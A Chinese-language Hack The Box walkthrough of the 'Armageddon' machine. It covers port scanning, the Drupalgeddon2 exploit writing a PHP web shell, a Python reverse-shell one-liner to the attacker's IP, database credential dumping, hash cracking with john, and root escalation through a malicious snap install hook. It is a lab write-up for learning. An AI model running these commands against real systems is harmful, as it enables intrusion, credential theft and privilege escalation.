关于渗透测试:HTBArmageddonsudo提权snap

51次阅读

共计 10405 个字符,预计需要花费 27 分钟才能阅读完成。

免责申明

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责

服务探测

┌──(root💀kali)-[~/htb/Armageddon]
└─# nmap -p- 10.10.10.233 --open -Pn
Starting Nmap 7.92 (https://nmap.org) at 2022-01-25 02:37 EST
Nmap scan report for 10.10.10.233
Host is up (0.25s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 78.51 seconds
                                                                                                                                                                                                                                            
┌──(root💀kali)-[~/htb/Armageddon]
└─# nmap -sV -Pn 10.10.10.233 -p 22,80                 
Starting Nmap 7.92 (https://nmap.org) at 2022-01-25 02:39 EST
Nmap scan report for 10.10.10.233
Host is up (0.25s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.83 seconds

web

只凋谢了两个端口,先查看 http 服务有什么文件信息

┌──(root💀kali)-[~]
└─# python3 /root/dirsearch/dirsearch.py -e* -u 10.10.10.233 -t 100          

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_|)

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100
Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.10.233_22-01-25_02-40-43.txt

Error Log: /root/dirsearch/logs/errors-22-01-25_02-40-43.log

Target: http://10.10.10.233/

[02:40:43] Starting: 
[02:40:50] 400 -  226B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd            
[02:40:54] 200 -  317B  - /.editorconfig                                   
[02:40:56] 200 -  174B  - /.gitignore                                                                      
[02:41:03] 200 -    1KB - /COPYRIGHT.txt                                    
[02:41:04] 200 -  109KB - /CHANGELOG.txt                                    
[02:41:04] 200 -    2KB - /INSTALL.pgsql.txt                                
[02:41:04] 200 -    2KB - /INSTALL.mysql.txt                                
[02:41:04] 200 -    9KB - /MAINTAINERS.txt                                  
[02:41:04] 200 -   18KB - /INSTALL.txt                                      
[02:41:04] 200 -   18KB - /LICENSE.txt
[02:41:05] 200 -    5KB - /README.txt                                       
[02:41:06] 200 -   10KB - /UPGRADE.txt                                      
[02:41:33] 403 -    3KB - /authorize.php                                    
[02:41:37] 400 -  226B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd     
[02:41:38] 403 -  210B  - /cgi-bin/                                         
[02:41:43] 403 -    7KB - /cron.php                                         
[02:41:58] 200 -   10KB - /includes/                                        
[02:41:58] 301 -  237B  - /includes  ->  http://10.10.10.233/includes/      
[02:41:58] 200 -    7KB - /index.php                                        
[02:41:59] 200 -    3KB - /install.php                                      
[02:42:04] 200 -  132KB - /includes/bootstrap.inc                           
[02:42:11] 301 -  233B  - /misc  ->  http://10.10.10.233/misc/              
[02:42:12] 200 -    9KB - /modules/                                         
[02:42:13] 301 -  236B  - /modules  ->  http://10.10.10.233/modules/        
[02:42:25] 301 -  237B  - /profiles  ->  http://10.10.10.233/profiles/      
[02:42:25] 200 -  743B  - /profiles/standard/standard.info                  
[02:42:25] 200 -  278B  - /profiles/testing/testing.info                    
[02:42:25] 200 -  271B  - /profiles/minimal/minimal.info                    
[02:42:27] 200 -    2KB - /robots.txt                                       
[02:42:29] 200 -    3KB - /scripts/                                         
[02:42:29] 301 -  236B  - /scripts  ->  http://10.10.10.233/scripts/        
[02:42:33] 301 -  234B  - /sites  ->  http://10.10.10.233/sites/            
[02:42:33] 200 -  151B  - /sites/all/libraries/README.txt                   
[02:42:33] 200 -    0B  - /sites/example.sites.php                          
[02:42:33] 200 -    1KB - /sites/all/modules/README.txt
[02:42:33] 200 -  904B  - /sites/README.txt                                 
[02:42:33] 200 - 1020B  - /sites/all/themes/README.txt
[02:42:40] 200 -    2KB - /themes/                                          
[02:42:41] 301 -  235B  - /themes  ->  http://10.10.10.233/themes/          
[02:42:43] 403 -    4KB - /update.php                                       
[02:42:49] 200 -    2KB - /web.config                                       
[02:42:51] 200 -   42B  - /xmlrpc.php    

在 CHANGELOG.txt 晓得这个 web app 是 DRUPAL,版本号是 7.56

kali 搜寻破绽信息

┌──(root💀kali)-[~/htb/Armageddon]
└─# searchsploit DRUPAL 7.56
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)          | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)       | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Executi | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metas | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)  | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Ex | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                    | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                | php/webapps/46459.py
------------------------

存在很多个 RCE,抉择 44449.rb,拿到 foodhold

┌──(root💀kali)-[~/htb/Armageddon]
└─# ./44449.rb http://10.10.10.233/
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.233/
--------------------------------------------------------------------------------
[+] Found  : http://10.10.10.233/CHANGELOG.txt    (HTTP Response: 200)
[+] Drupal!: v7.56
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo PROPZFZU
[+] Result : PROPZFZU
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://10.10.10.233/shell.php)
[!] Response: HTTP 200 // Size: 6.   ***Something could already be there?***
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if(isset( $_REQUEST['c'] ) ) {system( $_REQUEST['c'] . '2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell:   curl 'http://10.10.10.233/shell.php' -d 'c=hostname'
armageddon.htb>> id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
armageddon.htb>> whoami
apache

提权到 user

exp 的 shell 不是很好用,上面 payload 反弹一个残缺 shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

收到反弹 shell

┌──(root💀kali)-[~/htb/Armageddon]
└─# nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.233] 34420
sh: no job control in this shell
sh-4.2$ whoami
whoami
apache

传 linpeas 到靶机,枚举到数据库明码

╔══════════╣ Analyzing Drupal Files (limit 70)
-r--r--r--. 1 apache apache 26565 Dec  3  2020 /var/www/html/sites/default/settings.php                                                              
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '','driver'=>'mysql','prefix'=>'',

应用明码登陆数据库,查看用户信息

sh-4.2$ mysql -u drupaluser -p
mysql -u drupaluser -p
Enter password: CQHEy@9M*m23gBVj
use drupal;
select * from users;
uid     name    pass    mail    theme   signature       signature_format        created access  login   status  timezone        language  picture  init    data
0                                               NULL    0       0       0       0       NULL            0               NULL
1       brucetherealadmin       $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu                     filtered_html      1606998756      1607077194      1607076276      1       Europe/London           0       admin@armageddon.eu     a:1:{s:7:"overlay";i:1;}

把哈希复制到本地,应用 john 爆破

┌──(root💀kali)-[~/htb/Armageddon]
└─# john hash.txt -wordlist=/usr/share/wordlists/rockyou.txt  
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo           (?)     
1g 0:00:00:01 DONE (2022-01-25 05:21) 0.7142g/s 165.7p/s 165.7c/s 165.7C/s tiffany..harley
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

失去用户凭据:brucetherealadmin:booboo

应用 ssh 登陆,胜利拿到用户 shell

┌──(root💀kali)-[~/htb/Armageddon]
└─# ssh brucetherealadmin@10.10.10.233
brucetherealadmin@10.10.10.233's password: 
Last failed login: Tue Jan 25 10:13:02 GMT 2022 from 10.10.14.3 on ssh:notty
There were 2 failed login attempts since the last successful login.
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$ whoami
brucetherealadmin

提权到 root

查看 sudo 特权

[brucetherealadmin@armageddon tmp]$ sudo -l
匹配 %2$s 上 %1$s 的默认条目:!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

用户 brucetherealadmin 能够在 armageddon 上运行以下命令:(root) NOPASSWD: /usr/bin/snap install *

能够应用 snap 命令

依据 gtfobins 的批示,咱们先装置 fpm

┌──(root💀kali)-[~/htb/Armageddon]
└─# gem install fpm                                                                                              1 ⨯
Fetching fpm-1.14.1.gem
Fetching clamp-1.0.1.gem
Fetching git-1.10.2.gem
Successfully installed clamp-1.0.1
Successfully installed git-1.10.2
Successfully installed fpm-1.14.1
Parsing documentation for clamp-1.0.1
Installing ri documentation for clamp-1.0.1
Parsing documentation for git-1.10.2
Installing ri documentation for git-1.10.2
Parsing documentation for fpm-1.14.1
Installing ri documentation for fpm-1.14.1
Done installing documentation for clamp, git, fpm after 1 seconds
3 gems installed

顺次执行命令

┌──(root💀kali)-[~/htb/Armageddon]
└─# COMMAND=id 

┌──(root💀kali)-[~/htb/Armageddon]
└─# cd $(mktemp -d)
                                                                                                                     
┌──(root💀kali)-[/tmp/tmp.DmOZ5ETwqV]
└─# mkdir -p meta/hooks
                                                                                                                     
┌──(root💀kali)-[/tmp/tmp.DmOZ5ETwqV]
└─# printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
                                                                                                                     
┌──(root💀kali)-[/tmp/tmp.DmOZ5ETwqV]
└─# chmod +x meta/hooks/install

┌──(root💀kali)-[/tmp/tmp.DmOZ5ETwqV]
└─# fpm -n xxxx -s dir -t snap -a all meta
Created package {:path=>"xxxx_1.0_all.snap"}

传到靶机当前,看到胜利打印出了 id 命令,也就是下面指定的:COMMAND=id

[brucetherealadmin@armageddon tmp.nSgQp1eSXc]$ sudo /usr/bin/snap install xxxx_1.0_all.snap --dangerous --devmode
Run install hook of "xxxx" snap if present                                                                        |
error: cannot perform the following tasks:
- Run install hook of "xxxx" snap if present (run hook "install": uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_service_t:s0)

咱们把命令改为读取 root.txt, 再次编译

┌──(root💀kali)-[/tmp]
└─# COMMAND="cat /root/root.txt"
                                                                                                                     
┌──(root💀kali)-[/tmp]
└─# cd $(mktemp -d)
                                                                                                                     
┌──(root💀kali)-[/tmp/tmp.jfed6EbSgj]
└─# mkdir -p meta/hooks
                                                                                                                     
┌──(root💀kali)-[/tmp/tmp.jfed6EbSgj]
└─# printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
                                                                                                                     
┌──(root💀kali)-[/tmp/tmp.jfed6EbSgj]
└─# chmod +x meta/hooks/install
                                                                                                                     
┌──(root💀kali)-[/tmp/tmp.jfed6EbSgj]
└─# fpm -n xxxx -s dir -t snap -a all meta
Created package {:path=>"xxxx_1.0_all.snap"}

传到靶机当前胜利读取到 root.txt

[brucetherealadmin@armageddon tmp]$ curl http://10.10.14.3/xxxx_1.0_all.snap -O /tmp/xxxx_1.0_all.snap
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4096  100  4096    0     0   7499      0 --:--:-- --:--:-- --:--:--  7501
curl: (3) <url> malformed
[brucetherealadmin@armageddon tmp]$ sudo snap install xxxx_1.0_all.snap --dangerous --devmode
error: cannot perform the following tasks:
- Run install hook of "xxxx" snap if present (run hook "install": a7d88c233a477....)

正文完
 0